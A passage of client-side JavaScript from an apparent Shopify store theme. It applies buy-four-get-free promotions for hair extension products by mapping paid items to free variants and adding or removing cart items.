                    // Weft 24 STRAIGHT - Original product variant id first
                    shadow_products_map[6775828086934] = [];
                    shadow_products_map[6775828086934]['id'] = 6775841915030;
                    shadow_products_map[6775828086934]['url'] = '/products/weft-24-straight-shadow';
                    shadow_products_map[6775828086934]['short_name'] = 'Weft 24" Straight';
                    shadow_products_map[6775828086934]['class'] = 'sm--weft';
                    shadow_products_map[6775828086934]['variants'] = '{"39869579460758":39869610918038,"39869579493526":39869610950806,"39869579526294":39869610983574,"39869579559062":39869611016342,"39869579591830":39869611049110,"39869579624598":39869611081878,"39869579657366":39869611114646,"39869579690134":39869611147414,"39869579722902":39869611180182,"39869579755670":39869611212950,"39869579788438":39869611245718,"39869579821206":39869611278486,"39869579853974":39869611311254,"39869579886742":39869611344022,"39869579919510":39869611376790,"39869579952278":39869611409558,"39869579985046":39869611442326,"39869580017814":39869611475094,"39869580050582":39869611507862,"39869580083350":39869611540630,"39869580116118":39869611573398,"39869580148886":39869611606166,"39869580181654":39869611638934,"39869580214422":39869611671702,"39869580247190":39869611737238,"39869580279958":39869611770006,"39869580476566":39869611802774,"39869580509334":39869611835542,"39869580542102":39869611868310,"39869580574870":39869611901078,"39869580607638":39869611933846,"39869580640406":39869611966614,"39869580673174":39869611999382,"39869580705942":39869612032150,"39869580738710":39869612064918,"39869580771478":39869612097686,"39869580804246":39869612130454,"39869580968086":39869612163222,"39869581066390":39869612261526,"39869581099158":39869612294294,"39869581131926":39869612327062,"40120938365078":40120938397846,"40120970707094":40120970739862,"40120984338582":40120987844758,"40121001771158":40121001836694,"40121018187926":40121018318998,"40121044467862":40121045319830}';
                    // Weft 24 WAVY - Original product variant id first
                    shadow_products_map[6775843881110] = [];
                    shadow_products_map[6775843881110]['id'] = 6775850172566;
                    shadow_products_map[6775843881110]['url'] = '/products/weft-24-wavy-shadow';
                    shadow_products_map[6775843881110]['short_name'] = 'Weft 24" Wavy';
                    shadow_products_map[6775843881110]['class'] = 'sm--weft';
                    shadow_products_map[6775843881110]['variants'] = '{"39869615472790":39869633691798,"39869615505558":39869633724566,"39869615538326":39869633757334,"39869615571094":39869633790102,"39869615636630":39869633822870,"39869615669398":39869633855638,"39869615702166":39869633888406,"39869615734934":39869633921174,"39869615767702":39869633953942,"39869615800470":39869633986710,"39869615833238":39869634019478,"39869615866006":39869634052246,"39869615898774":39869634085014,"39869615931542":39869634117782,"39869615964310":39869634150550,"39869615997078":39869634183318,"39869616029846":39869634216086,"39869616062614":39869634248854,"39869616095382":39869634281622,"39869616128150":39869634314390,"39869616160918":39869634347158,"39869616193686":39869634379926,"39869616226454":39869634412694,"39869616259222":39869634445462,"39869616291990":39869634478230,"39869616324758":39869634510998,"39869616357526":39869634543766,"39869616390294":39869634576534,"39869616423062":39869634609302,"39869616455830":39869634642070,"39869616488598":39869634674838,"39869616521366":39869634707606,"39869616554134":39869634740374,"39869616586902":39869634773142,"39869616619670":39869634805910,"39869616652438":39869634838678,"39869616717974":39869634871446,"39869616816278":39869634969750,"39869616849046":39869635002518,"39869616881814":39869635035286,"40120938692758":40120938791062,"40120970805398":40120970870934,"40120988795030":40120988860566,"40121004621974":40121004654742,"40121017565334":40121017663638,"40121045385366":40121045418134}';

                    // Reverse mapping of shadow to paid
                    var shadow_products = {
                        2283829067835: 2277212454971,
                        6772698415254: 6772685176982,
                        6772704608406: 6772692385942,
                        6772907966614: 6772894761110,
                        6772914061462: 6772900626582,
                        6772733608086: 6772719583382,
                        6772726431894: 6772712964246,
                        2287559475259: 2278214533179,
                        2287480340539: 2280999747643,
                        6775699669142: 6775689052310,
                        6775749738646: 6775739121814,
                        6775810621590: 6775789093014,
                        6775824187542: 6775816650902,
                        6775841915030: 6775828086934,
                        6775850172566: 6775843881110,
                    };

                    // Free cylinders
                    var cylinder_free_map = {
                        4335782395963: 2296384618555
                    };

                    // How many cylinders to reward for each i-tip
                    var cylinder_multiplier = 1;

                    var cylinder = {};

                    cylinder = [];
                    cylinder['id'] = 2296384618555;
                    cylinder['shadow_id'] = 4335782395963;
                    cylinder['variants'] = '{"21230419836987":"31102791516219","21230420623419":"31102791548987","21230420656187":"31102791581755","21230420688955":"31102791614523","21230420721723":"31102791647291","21230420754491":"31102791680059","21230420787259":"31102791712827","21230420820027":"31102791745595","21230420852795":"31102791778363","21230420885563":"31102791811131","21230420918331":"31102791843899","21230420951099":"31102791876667","21230420983867":"31102791909435","21230421016635":"31102791942203","21230421049403":"31102791974971","21230421082171":"31102792007739","21230421114939":"31102792040507","21230421147707":"31102792073275"}';

                    var i_tip_count = 0;
                    var weft_count = 0;
                    var tape_count = 0;
                    var cylinder_counts = {};
                    cylinder_counts['total'] = 0;
                    cylinder_counts['paid'] = 0;
                    cylinder_counts['free'] = 0;

                    var cylinder_quantity_to_remove_paid = 0;
                    var cylinder_quantity_to_remove_free = 0;

                    // How many cylinders to reward for each i-tip
                    var weft_cylinder_multiplier = 1;

                    var weft_cylinder = {};

                    weft_cylinder = [];
                    weft_cylinder['id'] = 6893267681430;
                    weft_cylinder['shadow_id'] = 6944889176214;
                    weft_cylinder['variants'] = '{"40183881367702":"40302299644054","40183881400470":"40302299676822","40183881433238":"40302299709590","40183881466006":"40302299742358"}';

                    var weft_cylinder_counts = {};
                    weft_cylinder_counts['total'] = 0;
                    weft_cylinder_counts['paid'] = 0;
                    weft_cylinder_counts['free'] = 0;

                    var weft_cylinder_quantity_to_remove_paid = 0;
                    var weft_cylinder_quantity_to_remove_free = 0;

                    // How many tape tabs to reward for each i-tip
                    var tab_multiplier = 2;

                    // Free Single-Sided Tape Tabs
                    var tape_tab_free_map = {
                        5511031390358: 4339725205563
                    };

                    var tape_tab = {};

                    tape_tab['id'] = 4339725205563;
                    tape_tab['shadow_id'] = 5511031390358;
                    tape_tab['variants'] = '{"31120587620411":"35352873959574"}';

                    var tape_tab_counts = {};
                    tape_tab_counts['total'] = 0;
                    tape_tab_counts['paid'] = 0;
                    tape_tab_counts['free'] = 0;

                    var tape_tabs_quantity_to_remove_paid = 0;
                    var tape_tabs_quantity_to_remove_free = 0;

                    // Free Double-Sided Tape Tabs
                    var double_tape_tab_free_map = {
                        5515040129174: 2296387567675
                    };

                    var double_tape_tab = {};

                    double_tape_tab['id'] = 2296387567675;
                    double_tape_tab['shadow_id'] = 5515040129174;
                    double_tape_tab['variants'] = '{"21230427340859":"35372809552022"}';

                    var double_tape_tab_counts = {};
                    double_tape_tab_counts['total'] = 0;
                    double_tape_tab_counts['paid'] = 0;
                    double_tape_tab_counts['free'] = 0;

                    var double_tape_tabs_quantity_to_remove_paid = 0;
                    var double_tape_tabs_quantity_to_remove_free = 0;

                    var cart_product_ids_indexes = [];
                    $.each(cart.items, function(index, product) {

                        // Check for the free tool
                        if(product.id == free_tool_variant_id) {
                            has_free_tool += product.quantity;
                        }

                        // Check for the free training
                        if(product.id == free_training_variant_id) {
                            has_free_training += product.quantity;
                        }

                        // Check for the free training
                        if(product.vendor == 'dc-training') {
                            has_training = true;
                        }

                        // Check for the free training
                        if(product.product_type == 'accessories' || product.product_type == 'Hair') {
                            if(product.product_id != 5281805631638 && product.product_id != 2296386945083) {
                                hair_accessories_total += product.original_line_price;
                            }
                        }

                        if(
                            (product.product_id in shadow_products_map) && (product.id in jQuery.parseJSON(shadow_products_map[product.product_id]['variants']))
                            ||
                            (product.product_id in shadow_products)
                        ) {

                            if(cart_product_ids_indexes[product.product_id]) {
                                cart_product_ids_indexes[product.product_id]['quantity'] += product.quantity;
                            } else {
                                cart_product_ids_indexes[product.product_id] = [];
                                cart_product_ids_indexes[product.product_id]['index'] = index;
                                cart_product_ids_indexes[product.product_id]['quantity'] = product.quantity;
                            }

                            // ADDED BY SM - check which products are added and start adding the free ones
                            if(product.product_id in product_counts) {
                                product_counts[product.product_id]['total'] += product.quantity;
                                product_counts[product.product_id]['paid'] += product.quantity;
                            } else if (product.product_id in shadow_products) {
                                product_counts[shadow_products[product.product_id]]['total'] += product.quantity;
                            }

                            // Free cylinders. Counting I-tips
                            if((product.product_id in product_counts) || (product.product_id in shadow_products)) {
                                // Check I-Tips
                                if(product.title.includes('I-Tip')) {
                                    i_tip_count += product.quantity;
                                } else if (product.title.includes('Weft')) {
                                    // Count the Tape In
                                    weft_count += product.quantity;
                                } else {
                                    // Count the Tape In
                                    tape_count += product.quantity;
                                    if(product.product_id == 2280999747643) {
                                        max_tape_tabs += product.quantity;
                                    }
                                }
                            }

                        }

                        // Free cylinders. Counting cylinders
                        if(product.product_id == cylinder['id']) {
                            cylinder_counts['total'] += product.quantity;
                            cylinder_counts['paid'] += product.quantity;
                            cylinder_quantity_to_remove_paid += product.quantity;
                        } else if (product.product_id == cylinder['shadow_id']) {
                            cylinder_counts['total'] += product.quantity;
                            cylinder_counts['free'] += product.quantity;
                            cylinder_quantity_to_remove_free += product.quantity;
                        }

                        // Free weft cylinders. Counting cylinders
                        if(product.product_id == weft_cylinder['id']) {
                            weft_cylinder_counts['total'] += product.quantity;
                            weft_cylinder_counts['paid'] += product.quantity;
                            weft_cylinder_quantity_to_remove_paid += product.quantity;
                        } else if (product.product_id == weft_cylinder['shadow_id']) {
                            weft_cylinder_counts['total'] += product.quantity;
                            weft_cylinder_counts['free'] += product.quantity;
                            weft_cylinder_quantity_to_remove_free += product.quantity;
                        }

                        // Free tape tabs. Counting tape tabs
                        if(product.product_id == tape_tab['id'] || product.product_id == double_tape_tab['id']) {
                            tape_tab_counts['total'] += product.quantity;
                            tape_tab_counts['paid'] += product.quantity;
                            tape_tabs_quantity_to_remove_paid += product.quantity;
                        } else if (product.product_id == tape_tab['shadow_id'] || product.product_id == double_tape_tab['shadow_id']) {
                            tape_tab_counts['total'] += product.quantity;
                            tape_tab_counts['free'] += product.quantity;
                            tape_tabs_quantity_to_remove_free += product.quantity;
                            total_tape_tabs += product.quantity;
                        }

                        if(
                            product.product_type == 'training' ||
                            product.product_title == 'Online Certification Program' ||
                            product.product_title == 'Weft & K-Tip Online Training'
                        ) {
                            has_course = true;
                        }

                    });

                    max_tape_tabs *= tab_multiplier;
                    max_tape_tabs = parseInt(max_tape_tabs / 4);

                    // "Fixing" the proper amount of i-tips so the cylinder logic works
                    i_tip_count *= cylinder_multiplier;
                    weft_count *= weft_cylinder_multiplier;

                    // Cylinder quantities fix
                    if(cylinder_counts['paid'] > i_tip_count) {
                        cylinder_quantity_to_remove_paid = i_tip_count;
                    }

                    if(cylinder_counts['free'] > i_tip_count) {
                        cylinder_quantity_to_remove_free = cylinder_counts['free'] - i_tip_count;
                    }

                    // Weft Cylinder quantities fix
                    if(weft_cylinder_counts['paid'] > weft_count) {
                        weft_cylinder_quantity_to_remove_paid = weft_count;
                    }

                    if(weft_cylinder_counts['free'] > weft_count) {
                        weft_cylinder_quantity_to_remove_free = weft_cylinder_counts['free'] - weft_count;
                    }

                    // Tape Tabs quantities fix
                    if(tape_tab_counts['paid'] > tape_count) {
                        tape_tabs_quantity_to_remove_paid = tape_count;
                    }

                    if(tape_tab_counts['free'] > tape_count) {
                        tape_tabs_quantity_to_remove_free = tape_tab_counts['free'] - tape_count;
                    }

                    // Tape Tabs quantities fix
                    if(tape_tab_counts['paid'] > tape_count) {
                        tape_tabs_quantity_to_remove_paid = tape_count;
                    }

                    if(tape_tab_counts['free'] > tape_count) {
                        tape_tabs_quantity_to_remove_free = tape_tab_counts['free'] - tape_count;
                    }

                    // Added by SM - adding and/or removing products
                    var cart_updates = {};
                    var cart_adds = [];

                    // Added by SM - calculate how much of the paid to remove and from the free to add or vice versa
                    $.each(cart.items, function(index, product) {

                        // ADDED BY SM - check if any of the products have 4 or more quantity in the cart
                        // IF so, the next SAME product will be for free
                        if (product.product_id in shadow_products_map) {

                            if (product_counts[product.product_id]['paid'] >= 4) {

                                console.log('paid products ' + product_counts[product.product_id]['paid']);

                                if(product.id in jQuery.parseJSON(shadow_products_map[product.product_id]['variants'])) {

                                    // Check to see whether everything is already added and/ore removed. Also check if it needs updating
                                    // Check if a free shadow product is already in the cart. Shadow product id matching
                                    if (shadow_products_map[product.product_id]['id'] in cart_product_ids_indexes) {

                                        console.log('free product already in cart');

                                        var current_free_count = cart_product_ids_indexes[shadow_products_map[product.product_id]['id']].quantity;

                                        // var eligable_free = parseInt((product_counts[product.product_id]['total'] - current_free_count) / 4) * free_product_count;
                                        var eligable_free = parseInt(product_counts[product.product_id]['paid'] / (4 / free_product_count)) - current_free_count;

                                        console.log('current_free_count ' + current_free_count);
                                        console.log('eligable_free ' + eligable_free);

                                        if((current_free_count * (4 / free_product_count)) > product_counts[product.product_id]['paid']) {

                                            // There are too much free. Remove some of them
                                            removable_free[shadow_products_map[product.product_id]['id']] = Math.abs(eligable_free);

                                            console.log('free_products_to_remove ' + Math.abs(eligable_free));

                                        } else if ((current_free_count * (4 / free_product_count)) == product_counts[product.product_id]['paid']) {

                                            // There are just enough free. Do nothing

                                        } else {

                                            // calculating how much more paid need to be added for the next free
                                            // OR
                                            // calculating how much free need to be added
                                            if(eligable_free > 0) {

                                                // show message to choose X free product
                                                var free_products_to_choose = eligable_free;

                                                cart_message_free[shadow_products_map[product.product_id]['id']] = {
                                                    'quantity': free_products_to_choose,
                                                    'product_id': shadow_products_map[product.product_id]['id'],
                                                    'url': shadow_products_map[product.product_id]['url'],
                                                    'short_name': shadow_products_map[product.product_id]['short_name'],
                                                    'class': shadow_products_map[product.product_id]['class']
                                                };

                                                has_cart_message = true;

                                            } else {

                                                // show message to add x more paid to get 2 more free
                                                // var paid_products_to_add = (parseInt((product_counts[product.product_id]['total'] - current_free_count) / 4) + 1) * 6 - product_counts[product.product_id]['total'] - free_product_count;
                                                var paid_products_to_add = (4 / free_product_count) - (product_counts[product.product_id]['paid'] - (current_free_count * (4 / free_product_count)));
                                                var free_quantity = free_product_count;

                                                console.log('paid products to add ' + paid_products_to_add);

                                                // Handling the edge case where you have 11 + 5. This means one less paid for having one more free to add
                                                if(paid_products_to_add == 0) {
                                                    paid_products_to_add = 1;
                                                    free_quantity = 1;
                                                }

                                                cart_message_paid[product.product_id] = {
                                                    'quantity': paid_products_to_add,
                                                    'quantity_free': free_quantity,
                                                    'product_id': product.product_id,
                                                    'url': product_short_data[product.product_id]['url'],
                                                    'short_name': product_short_data[product.product_id]['short_name'],
                                                    'class': product_short_data[product.product_id]['class'],
                                                };

                                                has_cart_message = true;

                                            }

                                        }

                                    } else {

                                        console.log('free product NOT in cart');

                                        var free_to_add = 0;

                                        if(product_counts[product.product_id]['total'] == 4) {
                                            free_to_add = 0;
                                        } else {
                                            free_to_add = parseInt(product_counts[product.product_id]['paid'] / 4) * free_product_count;
                                        }

                                        if(free_to_add > 0) {
                                            removable[product.product_id] = product_counts[product.product_id]['total'] - free_to_add;
                                            addable[product.product_id] = free_to_add;
                                        } else {
                                            free_to_add = free_product_count;
                                        }

                                        cart_message_free[shadow_products_map[product.product_id]['id']] = {
                                            'quantity': free_to_add,
                                            'product_id': shadow_products_map[product.product_id]['id'],
                                            'url': shadow_products_map[product.product_id]['url'],
                                            'short_name': shadow_products_map[product.product_id]['short_name'],
                                            'class': shadow_products_map[product.product_id]['class'],
                                        };

                                        has_cart_message = true;

                                    }

                                }

                            } else {

                                // Removing the shadow product if there are not enough paid products
                                removable_free[shadow_products_map[product.product_id]['id']] = product.quantity;

                                if(product.id in jQuery.parseJSON(shadow_products_map[product.product_id]['variants'])) {

                                    cart_message_paid[product.product_id] = {
                                        'quantity': 4 - product_counts[product.product_id]['paid'],
                                        'quantity_free': free_product_count,
                                        'product_id': product.product_id,
                                        'url': product_short_data[product.product_id]['url'],
                                        'short_name': product_short_data[product.product_id]['short_name'],
                                        'class': product_short_data[product.product_id]['class'],
                                    };

                                    has_cart_message = true;

                                }

                            }

                        } else if (product.product_id in shadow_products) {

                            if (product_counts[shadow_products[product.product_id]]['paid'] < 4) {
                                removable_free[product.product_id] = product.quantity;
                            }

                        }

                        // Disabling the fee cylinders
                        i_tip_count = 0;

                        // Free cylinders
                        if(product.product_id == cylinder['id'] || product.product_id == cylinder['shadow_id']) {

                            if(i_tip_count > 0 && cylinder_counts['total'] > 0) {

                                if(cylinder_counts['free'] < i_tip_count) {

                                    if(cylinder_counts['paid'] > 0) {

                                        if(product.product_id == cylinder['id']) {

                                            if (cylinder_counts['paid'] <= i_tip_count) {

                                                if (product.quantity <= cylinder_quantity_to_remove_paid) {

                                                    // Remove all paid, add it as free and update cylinder_quantity_to_remove_paid
                                                    cart_updates[product.id] = 0;

                                                    cart_adds.push({
                                                        quantity: product.quantity,
                                                        id: jQuery.parseJSON(cylinder['variants'])[product.id],
                                                        properties: product.properties
                                                    });

                                                    cylinder_quantity_to_remove_paid -= product.quantity;

                                                } else {

                                                    cart_updates[product.id] = product.quantity - cylinder_quantity_to_remove_paid;

                                                    cart_adds.push({
                                                        quantity: cylinder_quantity_to_remove_paid,
                                                        id: jQuery.parseJSON(cylinder['variants'])[product.id],
                                                        properties: product.properties
                                                    });

                                                    cylinder_quantity_to_remove_paid = 0;

                                                }

                                                // Remove cylinder['paid'] paid and add them as free
                                                console.log("Remove cylinder_counts['paid'] - " + cylinder_counts['paid'] + " paid and add them as free");
                                                console.log(product);

                                            } else {

                                                if (product.quantity <= cylinder_quantity_to_remove_paid) {

                                                    // Remove all paid, add it as free and update cylinder_quantity_to_remove_paid
                                                    cart_updates[product.id] = 0;

                                                    cart_adds.push({
                                                        quantity: product.quantity,
                                                        id: jQuery.parseJSON(cylinder['variants'])[product.id],
                                                        properties: product.properties
                                                    });

                                                    cylinder_quantity_to_remove_paid -= product.quantity;

                                                } else {

                                                    cart_updates[product.id] = product.quantity - cylinder_quantity_to_remove_paid;

                                                    cart_adds.push({
                                                        quantity: cylinder_quantity_to_remove_paid,
                                                        id: jQuery.parseJSON(cylinder['variants'])[product.id],
                                                        properties: product.properties
                                                    });

                                                    cylinder_quantity_to_remove_paid = 0;

                                                }

                                                // Remove i_tip_count paid and add them as free
                                                console.log("Remove i_tip_count - " + i_tip_count + " paid and add them as free");
                                                console.log(product);

                                            }

                                        }

                                    } else {

                                        // No paid cylinders. Do nothing
                                        console.log('No paid cylinders. Do nothing');
                                        console.log(product);

                                    }

                                } else if (cylinder_counts['free'] > i_tip_count) {

                                    if(product.product_id == cylinder['shadow_id']) {

                                        if(product.quantity <= cylinder_quantity_to_remove_free) {

                                            // Remove all free
                                            cart_updates[product.id] = 0;

                                            cylinder_quantity_to_remove_free -= product.quantity;

                                        } else {

                                            // Remove some free
                                            cart_updates[product.id] = product.quantity - cylinder_quantity_to_remove_free;

                                            cylinder_quantity_to_remove_free = 0;

                                        }

                                    }

                                    jQuery('body').trigger('removeFreeProductReload');

                                    // Remove (cylinder['free'] - i_tip_count) free cylinders
                                    console.log("Remove (cylinder_counts['free'] - i_tip_count) - " + (cylinder_counts['free'] - i_tip_count) + " free cylinders");

                                } else {

                                    console.log('Just the right amount of free cylinders. Do nothing');

                                }

                            } else {

                                // Remove all free cylinders (if any)
                                if(product.product_id == cylinder['shadow_id']) {
                                    cart_updates[product.id] = 0;
                                }

                            }

                        }

                        // Disabling the weft fee cylinders
                        weft_count = 0;

                        // Free cylinders
                        if(product.product_id == weft_cylinder['id'] || product.product_id == weft_cylinder['shadow_id']) {

                            if(weft_count > 0 && weft_cylinder_counts['total'] > 0) {

                                if(weft_cylinder_counts['free'] < weft_count) {

                                    if(weft_cylinder_counts['paid'] > 0) {

                                        if(product.product_id == weft_cylinder['id']) {

                                            if (weft_cylinder_counts['paid'] <= weft_count) {

                                                if (product.quantity <= weft_cylinder_quantity_to_remove_paid) {

                                                    // Remove all paid, add it as free and update cylinder_quantity_to_remove_paid
                                                    cart_updates[product.id] = 0;

                                                    cart_adds.push({
                                                        quantity: product.quantity,
                                                        id: jQuery.parseJSON(weft_cylinder['variants'])[product.id],
                                                        properties: product.properties
                                                    });

                                                    weft_cylinder_quantity_to_remove_paid -= product.quantity;

                                                } else {

                                                    cart_updates[product.id] = product.quantity - weft_cylinder_quantity_to_remove_paid;

                                                    cart_adds.push({
                                                        quantity: weft_cylinder_quantity_to_remove_paid,
                                                        id: jQuery.parseJSON(weft_cylinder['variants'])[product.id],
                                                        properties: product.properties
                                                    });

                                                    weft_cylinder_quantity_to_remove_paid = 0;

                                                }

                                                // Remove cylinder['paid'] paid and add them as free
                                                console.log("Remove weft_cylinder_counts['paid'] - " + weft_cylinder_counts['paid'] + " paid and add them as free");
                                                console.log(product);

                                            } else {

                                                if (product.quantity <= weft_cylinder_quantity_to_remove_paid) {

                                                    // Remove all paid, add it as free and update cylinder_quantity_to_remove_paid
                                                    cart_updates[product.id] = 0;

                                                    cart_adds.push({
                                                        quantity: product.quantity,
                                                        id: jQuery.parseJSON(weft_cylinder['variants'])[product.id],
                                                        properties: product.properties
                                                    });

                                                    weft_cylinder_quantity_to_remove_paid -= product.quantity;

                                                } else {

                                                    cart_updates[product.id] = product.quantity - weft_cylinder_quantity_to_remove_paid;

                                                    cart_adds.push({
                                                        quantity: weft_cylinder_quantity_to_remove_paid,
                                                        id: jQuery.parseJSON(weft_cylinder['variants'])[product.id],
                                                        properties: product.properties
                                                    });

                                                    weft_cylinder_quantity_to_remove_paid = 0;

                                                }

                                                // Remove i_tip_count paid and add them as free
                                                console.log("Remove weft cylinder - " + weft_count + " paid and add them as free");
                                                console.log(product);

                                            }

                                        }

                                    } else {

                                        // No paid cylinders. Do nothing
                                        console.log('No paid weft cylinders. Do nothing');
                                        console.log(product);

                                    }

                                } else if (weft_cylinder_counts['free'] > weft_count) {

                                    if(product.product_id == weft_cylinder['shadow_id']) {

                                        if(product.quantity <= weft_cylinder_quantity_to_remove_free) {

                                            // Remove all free
                                            cart_updates[product.id] = 0;

                                            weft_cylinder_quantity_to_remove_free -= product.quantity;

                                        } else {

                                            // Remove some free
                                            cart_updates[product.id] = product.quantity - weft_cylinder_quantity_to_remove_free;

                                            weft_cylinder_quantity_to_remove_free = 0;

                                        }

                                    }

                                    jQuery('body').trigger('removeFreeProductReload');

                                    // Remove (cylinder['free'] - i_tip_count) free cylinders
                                    console.log("Remove (weft cylinder_counts['free'] - weft_count) - " + (weft_cylinder_counts['free'] - weft_count) + " free cylinders");

                                } else {

                                    console.log('Just the right amount of free cylinders. Do nothing');

                                }

                            } else {

                                // Remove all free cylinders (if any)
                                if(product.product_id == weft_cylinder['shadow_id']) {
                                    cart_updates[product.id] = 0;
                                }

                            }

                        }

                        // Disabling the free tape tabs
                        max_tape_tabs = 0;

                        // Free tape tabs
                        if(product.product_id == tape_tab['shadow_id'] || product.product_id == double_tape_tab['shadow_id']) {

                            if(max_tape_tabs == 0) {

                                // remove all free tape tabs
                                cart_updates[product.id] = 0;
                                total_tape_tabs = 0;
                                jQuery('body').trigger('removeFreeProductReload');

                            } else {

                                if(total_tape_tabs > max_tape_tabs) {

                                    // Need to remove free tape tabs
                                    if(product.quantity > max_tape_tabs) {
                                        cart_updates[product.id] = max_tape_tabs;
                                        total_tape_tabs = product.quantity - max_tape_tabs;
                                        jQuery('body').trigger('removeFreeProductReload');
                                    } else if (product.quantity <= max_tape_tabs) {
                                        cart_updates[product.id] = 0;
                                        total_tape_tabs -= product.quantity;
                                        jQuery('body').trigger('removeFreeProductReload');
                                    }

                                }

                            }

                        }

                        if(product.product_id == tape_tab['id'] || product.product_id == double_tape_tab['id']) {

                            if(max_tape_tabs > total_tape_tabs) {

                                // User is eligible for free tape tabs. Remove from paid and add as free
                                if(product.quantity >= max_tape_tabs - total_tape_tabs) {

                                    cart_updates[product.id] = product.quantity - (max_tape_tabs - total_tape_tabs);

                                    if(product.product_id == tape_tab['id']) {

                                        cart_adds.push({
                                            quantity: max_tape_tabs - total_tape_tabs,
                                            id: jQuery.parseJSON(tape_tab['variants'])[product.id],
                                            properties: product.properties
                                        });

                                    } else {

                                        cart_adds.push({
                                            quantity: max_tape_tabs - total_tape_tabs,
                                            id: jQuery.parseJSON(double_tape_tab['variants'])[product.id],
                                            properties: product.properties
                                        });

                                    }

                                    total_tape_tabs = max_tape_tabs;
                                    jQuery('body').trigger('removeFreeProductReload');

                                } else {

                                    cart_updates[product.id] = 0;

                                    if(product.product_id == tape_tab['id']) {

                                        cart_adds.push({
                                            quantity: product.quantity,
                                            id: jQuery.parseJSON(tape_tab['variants'])[product.id],
                                            properties: product.properties
                                        });

                                    } else {

                                        cart_adds.push({
                                            quantity: product.quantity,
                                            id: jQuery.parseJSON(double_tape_tab['variants'])[product.id],
                                            properties: product.properties
                                        });

                                    }

                                    total_tape_tabs += product.quantity;
                                    jQuery('body').trigger('removeFreeProductReload');

                                }

                            }

                        }

                    });

                    $.each(cart.items, function(index, product) {

                        // removing X amount of the free products
                        if(product.product_id in removable_free) {

                            // All quantity will be removed from the current product
                            if(removable_free[product.product_id] <= product.quantity) {

                                jQuery('body').trigger('removeFreeProductReload');

                                cart_updates[product.id] = (product.quantity - removable_free[product.product_id])

                                delete removable_free[product.product_id];

                            } else {

                                // Update the removable_free quantity with what's left to remove
                                removable_free[product.product_id] -= product.quantity;

                                // Remove the product from the cart
                                cart_updates[product.id] = 0;

                            }

                        } else if (product.product_id in removable) {

                            // Need to remove the paid products here and add their corresponding free ones
                            if(product_counts[product.product_id]['total'] - removable[product.product_id] <= product.quantity) {

                                cart_adds.push({
                                    quantity: addable[product.product_id],
                                    id: jQuery.parseJSON(shadow_products_map[product.product_id]['variants'])[product.id],
                                    properties: product.properties
                                });

                                // Remove the product from the cart
                                cart_updates[product.id] = product.quantity - addable[product.product_id];

                                delete removable[product.product_id];

                            } else {

                            }

                        }

                    });

                    // Check if person is certified and only have this enabled when certified
                    if(customer_tags && !customer_tags.includes('certified') && !customer_tags.includes('certified_weft')) {
                        free_tool_id = false;
                    } else if (!customer_tags) {
                        free_tool_id = false;
                    }

                    free_tool_id = false;

                    // If free tool
                    if(free_tool_id) {

                        var tool_message = '<span class="amount-left">' + theme.Currency.formatMoney(free_tool_treshold, theme.settings.moneyFormat) + '</span> left to get a <b>FREE Pop & Release Tool</b>';
                        var training_message = false;

                        if(hair_accessories_total >= free_tool_treshold && hair_accessories_total < free_training_treshold) {

                            if(!has_free_tool) {

                                tool_message = false;
                                training_message = '<span class="amount-left">' + theme.Currency.formatMoney(free_training_treshold - hair_accessories_total, theme.settings.moneyFormat) + '</span> left to get a <b>FREE Online Training</b>';

                                cart_adds.push({
                                    quantity: 1,
                                    id: free_tool_variant_id,
                                    properties: {}
                                });

                            } else {

                                tool_message = false;
                                training_message = '<span class="amount-left">' + theme.Currency.formatMoney(free_training_treshold - hair_accessories_total, theme.settings.moneyFormat) + '</span> left to get a <b>FREE Online Training</b>';

                            }

                        } else if (hair_accessories_total >= free_training_treshold) {

                            tool_message = false;
                            training_message = '<span class="amount-left">CONGRATULATIONS!</span> Our team will get in touch with you for your <b>FREE Online Training</b>';

                            if(!has_free_tool) {

                                // Add the free tool
                                cart_adds.push({
                                    quantity: 1,
                                    id: free_tool_variant_id,
                                    properties: {}
                                });

                            }

                            if (!has_free_training) {

                                // Add the free training
                                cart_adds.push({
                                    quantity: 1,
                                    id: free_training_variant_id,
                                    properties: {}
                                })


                            }

                        } else {

                            tool_message = '<span class="amount-left">' + theme.Currency.formatMoney(free_tool_treshold - hair_accessories_total, theme.settings.moneyFormat) + '</span> left to get a <b>FREE Pop & Release Tool</b>';
                            training_message = false;

                        }

                        if(tool_message) {
                            tool_message += ' <br><span style="font-size: 11px;">(Tool will be added to your cart automatically)</span>';
                        }

                        // Check whether to remove the free tool
                        if(CartJS.cart.total_price >= free_tool_treshold && has_free_tool > 1) {
                            cart_updates[free_tool_variant_id] = 1;
                            jQuery('body').trigger('removeFreeProductReload');
                        } else if (CartJS.cart.total_price < free_tool_treshold && has_free_tool) {
                            cart_updates[free_tool_variant_id] = 0;
                            jQuery('body').trigger('removeFreeProductReload');
                        }

                        // Check whether to remove the free training
                        if(CartJS.cart.total_price >= free_training_treshold && has_free_training > 1) {
                            cart_updates[free_training_variant_id] = 1;
                            jQuery('body').trigger('removeFreeProductReload');
                        } else if (CartJS.cart.total_price < free_training_treshold && has_free_training) {
                            // cart_updates[free_training_variant_id] = 0;
                            // jQuery('body').trigger('removeFreeProductReload');
                        }

                    }

                    // Because the hands-on now also gives a free online training
                    if (has_free_training > 1) {
                        cart_updates[free_training_variant_id] = 1;
                        jQuery('body').trigger('removeFreeProductReload');
                    }

                    if(has_training && (!has_free_training || has_free_training > 1)) {
                        cart_updates[free_training_variant_id] = 1;
                        jQuery('body').trigger('removeFreeProductReload');
                    }

                    // Additional checks for the FREE online training
                    if(!free_tool_id) {
                        if(!has_training && has_free_training) {
                            cart_updates[free_training_variant_id] = 0;
                            jQuery('body').trigger('removeFreeProductReload');
                        }
                    } else {
                        if (!has_training && has_free_training && CartJS.cart.total_price < free_tool_treshold) {
                            cart_updates[free_training_variant_id] = 0;
                            jQuery('body').trigger('removeFreeProductReload');
                        }
                    }

                    // Adding items
                    $.each(cart_adds, function (index, add) {

                        CartJS.addItem(add.id, add.quantity, add.properties, {
                            "success": function(data, textStatus, jqXHR) {

                                var prodImg;
                                if (data.image !== null) {
                                    prodImg = data.image.replace(/(\.[^.]*)$/, "_180x$1");
                                } else {
                                    prodImg = '//cdn.shopify.com/s/assets/admin/no-image-medium-cc9732cb976dd349a0df1d39816fbcc7.gif';
                                }

                                // Adding the new item to the items array
                                item = {
                                    key: data.key,
                                    url: data.url,
                                    img: prodImg,
                                    animationRow: animation_row + 2,
                                    name: data.product_title,
                                    variation: data.variant_title,
                                    properties: data.properties,
                                    itemQty: data.quantity,
                                    price: theme.Currency.formatMoney(data.price, theme.settings.moneyFormat),
                                    discountedPrice: theme.Currency.formatMoney(data.price, theme.settings.moneyFormat),
                                    discounts: [],
